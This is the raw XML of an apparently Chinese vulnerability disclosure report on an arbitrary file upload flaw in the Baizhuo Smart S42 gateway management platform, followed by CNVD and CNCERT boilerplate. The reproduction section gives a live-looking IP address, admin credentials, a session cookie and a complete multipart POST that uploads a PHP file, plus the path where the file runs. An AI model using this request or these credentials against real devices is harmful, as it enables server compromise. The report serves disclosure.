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0" w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体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eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>百卓网络Smart S42管理平台存在文件上传漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="15"/>
        <w:keepNext/>
        <w:keepLines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漏洞描述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  <w:t>北京百卓网络技术有限公司（以下简称百卓网络）是一家致力于构建下一代安全互联网的高新技术企业。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  <w:t>百卓网络Smart S42网关智能管理平台存在文件上传漏洞。攻击者可利用漏洞获取服务器权限，操作服务器文件。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>本漏洞均为代码审计结果，所以不提供互联网案例，提供复现视频。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</w:pP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二、漏洞影响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333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Smart S42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三、漏洞位置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/useratte/userattestation.php</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto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代码分析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eastAsia="宋体" w:cs="Times New Roman"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>代码中进入hidwel分支，且代码125、126行的上传文件没有进行任何后缀限制，造成任意文件上传。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64150" cy="4301490"/>
            <wp:effectExtent l="0" t="0" r="1270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五、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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t>Ip：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://113.9.192.214:8443/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1、如图登录界面。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admin/zj40245917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71135" cy="251333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构造POC，直接上传1.php文件。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POST /useratte/userattestation.php HTTP/1.1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Host: 113.9.192.214:8443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Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50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User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8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Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2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Accept-Encoding: gzip, deflate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Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328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Content-Length: 592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Origin: https://113.9.192.214:8443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Upgrade-Insecure-Requests: 1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Sec-Fetch-Dest: document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Sec-Fetch-Mode: navigate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Sec-Fetch-Site: same-origin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Sec-Fetch-User: ?1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Te: trailers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Connection: close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Content-Disposition: form-data; name="web_img"; filename="1.php"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Content-Type: application/octet-stream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&lt;?php phpinfo();?&gt;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Content-Disposition: form-data; name="id_type"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Content-Disposition: form-data; name="1_ck"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1_radhttp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Content-Disposition: form-data; name="hidwel"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set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-----------------------------42328904123665875270630079328?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72405" cy="3675380"/>
            <wp:effectExtent l="0" t="0" r="444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访问/boot/web/upload/weblogo/1.php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65420" cy="3679825"/>
            <wp:effectExtent l="0" t="0" r="11430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uppressAutoHyphens/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>CNVD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国家信息安全漏洞共享平台（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>China National Vulnerability Database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>，简称</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CNVD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>）是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CNCERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>联合国内重要信息系统单位、基础电信运营商、网络安全厂商、软件厂商和互联网企业建立的国家网络安全漏洞库，致力于建立国家统一的信息安全漏洞收集、发布、验证、分析等应急处理体系。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>CNCERT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国家计算机网络应急技术处理协调中心（简称“国家互联网应急中心”，英文简称是CNCERT或CNCERT/CC），成立于2002年9月，为非政府非盈利的网络安全技术中心，是我国网络安全应急体系的核心技术协调机构。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作为国家级应急中心，CNCERT的主要职责是：按照“积极预防、及时发现、快速响应、力保恢复”的方针，开展互联网网络安全事件的预防、发现、预警和协调处置等工作，维护国家公共互联网安全，保障基础信息网络和重要信息系统的安全运行。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网址：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>www.cert.org.cn</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:suppressAutoHyphens/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="440" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>邮箱：</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "mailto:vreport@cert.org.cn" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>vreport@cert.org.cn</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="12"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/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电话：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>010-82991537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AA9550"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="8EAA955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7904FC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07904FC0"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="7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6338C1"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="2F6338C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hYzZhYjljMzQ3ZDY2YWJjZjJmM2RlNDZjMzhkZWIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="006213B3"/>
    <w:rsid w:val="00001CDE"/>
    <w:rsid w:val="00010D0D"/>
    <w:rsid w:val="00037F1F"/>
    <w:rsid w:val="000C2001"/>
    <w:rsid w:val="001369E2"/>
    <w:rsid w:val="001575EC"/>
    <w:rsid w:val="00170BB7"/>
    <w:rsid w:val="00230F3E"/>
    <w:rsid w:val="0024588F"/>
    <w:rsid w:val="00262E5E"/>
    <w:rsid w:val="002A4555"/>
    <w:rsid w:val="002D20BB"/>
    <w:rsid w:val="002E21BA"/>
    <w:rsid w:val="00306AB6"/>
    <w:rsid w:val="0039784F"/>
    <w:rsid w:val="003A229D"/>
    <w:rsid w:val="003A2B39"/>
    <w:rsid w:val="003F502E"/>
    <w:rsid w:val="004255E4"/>
    <w:rsid w:val="0047371C"/>
    <w:rsid w:val="00480E0D"/>
    <w:rsid w:val="004870EA"/>
    <w:rsid w:val="004905DF"/>
    <w:rsid w:val="004E0FFE"/>
    <w:rsid w:val="004F1393"/>
    <w:rsid w:val="004F510B"/>
    <w:rsid w:val="00511597"/>
    <w:rsid w:val="00524BAC"/>
    <w:rsid w:val="00533123"/>
    <w:rsid w:val="00573802"/>
    <w:rsid w:val="005A6B15"/>
    <w:rsid w:val="005D0C0E"/>
    <w:rsid w:val="005E142C"/>
    <w:rsid w:val="005F1952"/>
    <w:rsid w:val="00615146"/>
    <w:rsid w:val="006213B3"/>
    <w:rsid w:val="00637A2B"/>
    <w:rsid w:val="00650CC3"/>
    <w:rsid w:val="006642D0"/>
    <w:rsid w:val="006806DC"/>
    <w:rsid w:val="006B27A6"/>
    <w:rsid w:val="006B623F"/>
    <w:rsid w:val="006E015C"/>
    <w:rsid w:val="006E661D"/>
    <w:rsid w:val="00755173"/>
    <w:rsid w:val="00793056"/>
    <w:rsid w:val="007B58EA"/>
    <w:rsid w:val="007E2336"/>
    <w:rsid w:val="008011AB"/>
    <w:rsid w:val="008637D4"/>
    <w:rsid w:val="00877BD6"/>
    <w:rsid w:val="008F6A37"/>
    <w:rsid w:val="009052D2"/>
    <w:rsid w:val="00976644"/>
    <w:rsid w:val="009A48FE"/>
    <w:rsid w:val="009D18AD"/>
    <w:rsid w:val="00A27651"/>
    <w:rsid w:val="00A31BF5"/>
    <w:rsid w:val="00AC11C9"/>
    <w:rsid w:val="00AD304A"/>
    <w:rsid w:val="00AE15A5"/>
    <w:rsid w:val="00B61386"/>
    <w:rsid w:val="00BB6D44"/>
    <w:rsid w:val="00BC7E83"/>
    <w:rsid w:val="00BD2BFB"/>
    <w:rsid w:val="00BD3D37"/>
    <w:rsid w:val="00BE3C46"/>
    <w:rsid w:val="00BF3455"/>
    <w:rsid w:val="00C20264"/>
    <w:rsid w:val="00C647E9"/>
    <w:rsid w:val="00C81469"/>
    <w:rsid w:val="00C919E5"/>
    <w:rsid w:val="00C96C40"/>
    <w:rsid w:val="00CB7F4B"/>
    <w:rsid w:val="00CE62E2"/>
    <w:rsid w:val="00D176B4"/>
    <w:rsid w:val="00D32A57"/>
    <w:rsid w:val="00D44B49"/>
    <w:rsid w:val="00D562CD"/>
    <w:rsid w:val="00D753C1"/>
    <w:rsid w:val="00D84453"/>
    <w:rsid w:val="00E0520A"/>
    <w:rsid w:val="00E32801"/>
    <w:rsid w:val="00E553DD"/>
    <w:rsid w:val="00E72F03"/>
    <w:rsid w:val="00E77700"/>
    <w:rsid w:val="00E90D66"/>
    <w:rsid w:val="00ED1FE1"/>
    <w:rsid w:val="00EE08A9"/>
    <w:rsid w:val="00F42EC6"/>
    <w:rsid w:val="019D115B"/>
    <w:rsid w:val="01A83C34"/>
    <w:rsid w:val="01FC65DB"/>
    <w:rsid w:val="03B06183"/>
    <w:rsid w:val="0433224A"/>
    <w:rsid w:val="050F194E"/>
    <w:rsid w:val="05364417"/>
    <w:rsid w:val="053848CA"/>
    <w:rsid w:val="06D74A36"/>
    <w:rsid w:val="079A151B"/>
    <w:rsid w:val="096502A5"/>
    <w:rsid w:val="0A5F42DA"/>
    <w:rsid w:val="0AC21C32"/>
    <w:rsid w:val="0C027DB2"/>
    <w:rsid w:val="0CBB2DDD"/>
    <w:rsid w:val="0D116EA1"/>
    <w:rsid w:val="0F800294"/>
    <w:rsid w:val="100A5238"/>
    <w:rsid w:val="10543F61"/>
    <w:rsid w:val="10E02C19"/>
    <w:rsid w:val="120A0758"/>
    <w:rsid w:val="136F387A"/>
    <w:rsid w:val="13C72D3C"/>
    <w:rsid w:val="148517CB"/>
    <w:rsid w:val="150165D7"/>
    <w:rsid w:val="15A5462A"/>
    <w:rsid w:val="1816572D"/>
    <w:rsid w:val="18613716"/>
    <w:rsid w:val="18826EA4"/>
    <w:rsid w:val="19797068"/>
    <w:rsid w:val="1A084D34"/>
    <w:rsid w:val="1A4C776A"/>
    <w:rsid w:val="1BA66BDD"/>
    <w:rsid w:val="1BCF5505"/>
    <w:rsid w:val="1C9406D5"/>
    <w:rsid w:val="1E3D28B1"/>
    <w:rsid w:val="1ECE074D"/>
    <w:rsid w:val="201025BC"/>
    <w:rsid w:val="20CA3197"/>
    <w:rsid w:val="23D762F6"/>
    <w:rsid w:val="246F652F"/>
    <w:rsid w:val="24A65CC9"/>
    <w:rsid w:val="250057E6"/>
    <w:rsid w:val="262D0AB8"/>
    <w:rsid w:val="267E6EFD"/>
    <w:rsid w:val="26CC5EBA"/>
    <w:rsid w:val="288C1862"/>
    <w:rsid w:val="288D5A01"/>
    <w:rsid w:val="291F5568"/>
    <w:rsid w:val="2A043BBD"/>
    <w:rsid w:val="2B7A18F0"/>
    <w:rsid w:val="2BD63337"/>
    <w:rsid w:val="2C6F0D4C"/>
    <w:rsid w:val="2E180BA0"/>
    <w:rsid w:val="303F76FD"/>
    <w:rsid w:val="30683E50"/>
    <w:rsid w:val="313616CD"/>
    <w:rsid w:val="32002EBC"/>
    <w:rsid w:val="322F5343"/>
    <w:rsid w:val="327F2033"/>
    <w:rsid w:val="33047CAF"/>
    <w:rsid w:val="33354DE7"/>
    <w:rsid w:val="3363329C"/>
    <w:rsid w:val="33741CCC"/>
    <w:rsid w:val="33DD400A"/>
    <w:rsid w:val="347E2031"/>
    <w:rsid w:val="34C957E7"/>
    <w:rsid w:val="34EC2887"/>
    <w:rsid w:val="35862195"/>
    <w:rsid w:val="358E6A31"/>
    <w:rsid w:val="369B7804"/>
    <w:rsid w:val="36A61DD4"/>
    <w:rsid w:val="380C3D81"/>
    <w:rsid w:val="384F06F9"/>
    <w:rsid w:val="38B8629F"/>
    <w:rsid w:val="39BA6046"/>
    <w:rsid w:val="3A0177D1"/>
    <w:rsid w:val="3AC84793"/>
    <w:rsid w:val="3B5D24CB"/>
    <w:rsid w:val="3B91210A"/>
    <w:rsid w:val="3B934DA1"/>
    <w:rsid w:val="3BC600F4"/>
    <w:rsid w:val="3E2B2584"/>
    <w:rsid w:val="3E6E73FF"/>
    <w:rsid w:val="3E8E39AB"/>
    <w:rsid w:val="3EB017C6"/>
    <w:rsid w:val="3EBB582A"/>
    <w:rsid w:val="3F2F3033"/>
    <w:rsid w:val="3F4168C2"/>
    <w:rsid w:val="3F5C3A3A"/>
    <w:rsid w:val="3FB719C6"/>
    <w:rsid w:val="40102FD9"/>
    <w:rsid w:val="4013200C"/>
    <w:rsid w:val="40520013"/>
    <w:rsid w:val="410D1152"/>
    <w:rsid w:val="41AE46E3"/>
    <w:rsid w:val="43067656"/>
    <w:rsid w:val="430772CC"/>
    <w:rsid w:val="43917E43"/>
    <w:rsid w:val="464873AB"/>
    <w:rsid w:val="46A237CA"/>
    <w:rsid w:val="47033663"/>
    <w:rsid w:val="47757331"/>
    <w:rsid w:val="48003DB3"/>
    <w:rsid w:val="48594C7C"/>
    <w:rsid w:val="48CC050C"/>
    <w:rsid w:val="48F51A16"/>
    <w:rsid w:val="4A8D53F1"/>
    <w:rsid w:val="4CB608EF"/>
    <w:rsid w:val="50520B83"/>
    <w:rsid w:val="511E6751"/>
    <w:rsid w:val="51A06085"/>
    <w:rsid w:val="52473DBA"/>
    <w:rsid w:val="52D9729F"/>
    <w:rsid w:val="53237AB1"/>
    <w:rsid w:val="53B35B89"/>
    <w:rsid w:val="53F046E7"/>
    <w:rsid w:val="551D6150"/>
    <w:rsid w:val="55381463"/>
    <w:rsid w:val="558F6181"/>
    <w:rsid w:val="55AA1DC0"/>
    <w:rsid w:val="55BB6F76"/>
    <w:rsid w:val="568B216D"/>
    <w:rsid w:val="576D458F"/>
    <w:rsid w:val="57A068C5"/>
    <w:rsid w:val="58082731"/>
    <w:rsid w:val="585E2B86"/>
    <w:rsid w:val="58663C4B"/>
    <w:rsid w:val="5C01479F"/>
    <w:rsid w:val="5C116F6E"/>
    <w:rsid w:val="5D63737C"/>
    <w:rsid w:val="5DCE70D5"/>
    <w:rsid w:val="5DCF0038"/>
    <w:rsid w:val="5E33093D"/>
    <w:rsid w:val="5E714676"/>
    <w:rsid w:val="5E7F5EB7"/>
    <w:rsid w:val="5ECC0BD1"/>
    <w:rsid w:val="5FB40CBE"/>
    <w:rsid w:val="5FCF3721"/>
    <w:rsid w:val="614E5143"/>
    <w:rsid w:val="61D14A80"/>
    <w:rsid w:val="629F6DAD"/>
    <w:rsid w:val="62D469B3"/>
    <w:rsid w:val="63AB0158"/>
    <w:rsid w:val="668F04BA"/>
    <w:rsid w:val="696562F3"/>
    <w:rsid w:val="6A1239F9"/>
    <w:rsid w:val="6A847BAB"/>
    <w:rsid w:val="6AD96528"/>
    <w:rsid w:val="6BB87FE7"/>
    <w:rsid w:val="6BD05FDD"/>
    <w:rsid w:val="6C7C57CC"/>
    <w:rsid w:val="6CE658A5"/>
    <w:rsid w:val="6E03367A"/>
    <w:rsid w:val="6F34175B"/>
    <w:rsid w:val="6FD74C3F"/>
    <w:rsid w:val="70185887"/>
    <w:rsid w:val="705A263A"/>
    <w:rsid w:val="708B7819"/>
    <w:rsid w:val="70CD6084"/>
    <w:rsid w:val="715B636F"/>
    <w:rsid w:val="716345F2"/>
    <w:rsid w:val="71D77955"/>
    <w:rsid w:val="74BB5821"/>
    <w:rsid w:val="763B3A90"/>
    <w:rsid w:val="764A0457"/>
    <w:rsid w:val="766069B5"/>
    <w:rsid w:val="76CA4E14"/>
    <w:rsid w:val="77040325"/>
    <w:rsid w:val="77274B50"/>
    <w:rsid w:val="786362D3"/>
    <w:rsid w:val="78AA46F2"/>
    <w:rsid w:val="79362D64"/>
    <w:rsid w:val="79D26382"/>
    <w:rsid w:val="7AC17BBB"/>
    <w:rsid w:val="7AF5697C"/>
    <w:rsid w:val="7C144E7D"/>
    <w:rsid w:val="7CCA6A7C"/>
    <w:rsid w:val="7CEB4CF9"/>
    <w:rsid w:val="7E0F1D4B"/>
    <w:rsid w:val="7E3A63DB"/>
    <w:rsid w:val="7ECB34D7"/>
    <w:rsid w:val="7EDF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4">
    <w:name w:val="页脚 Char"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="5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批注框文本 Char"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="4"/>
    <w:semiHidden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341</Words>
  <Characters>1945</Characters>
  <Lines>16</Lines>
  <Paragraphs>4</Paragraphs>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2282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2023-07-03T09:17:00Z</dcterms:created>
  <dc:creator>8615027325414</dc:creator>
  <cp:lastModifiedBy>Echo丶</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-19T06:10:13Z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B0F0B373ED8E47FA923D0CBD05ADE93E_13</vt:lpwstr>
  </property>
</Properties>
</file>